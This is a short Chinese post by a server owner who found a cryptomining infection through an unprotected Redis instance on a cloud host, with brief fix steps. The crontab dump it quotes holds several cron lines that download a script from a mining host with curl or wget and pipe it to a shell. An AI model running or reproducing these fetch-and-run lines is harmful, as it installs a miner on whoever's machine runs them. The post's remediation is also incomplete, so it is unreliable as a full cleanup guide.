在12月1号, 玩redis时连接的远程一台腾讯云服务器, xhsell连接明显有卡顿, 强制重启了下服务器, 结果连系统都不能正常启动, ssh服务更别说了, 于是重装了下系统, 用的root用户重新安装了一下redis, 今天发现每过一段时间, 我正在操作xshell就断了, 重新连接后, 查看redis服务, 也挂了(redis守护进程方式运行的) , 有一种像中毒的感觉, 于是查看当前用户, 当前在线用户, 没有发现异常, 然后查看腾讯云控制台安全操作, 没有发现异常, 最后查询linux 定时任务, 发现如下内容:
crontab -l
REDIS0009 redis-ver5.0.7
redis-bitse_.used-memè
𮤭preamble~k1@@
*/1 * * * * curl -fsSL http://pm.cpuminerpool.com/pm.sh | sh
Back3@@
*/13 * * * * url -fsSL http://pm.cpuminerpool.com/pm.sh | sh
Back2@F
*/5 * * * * wget http://pm.cpuminerpool.com/pm.sh -O .p && bash .p
namedongBack5@@
*/30 * * * * cur -fsSL http://pm.cpuminerpool.com/pm.sh | sh
Back4@G\t
*/20 * * * * get http://pm.cpuminerpool.com/pm.sh -O .p && bash .p
ÿbﳍ8[root@VM_0_5_centos ~]# XshellXshellXshellXshellXshellXshellXshell
除了上面redis 那一条, 下面看起来貌似正常, 然后复制一些内容去网上一查, 是挖矿木马, 有一篇帖子分析的比较详细, 包括预防, 修复:
http://hbu.hetianlab.com/html/news/news-2019090501.html
修复:
1. redis设置密码
2. 删除定时任务: crontab -r
3. 重启服务器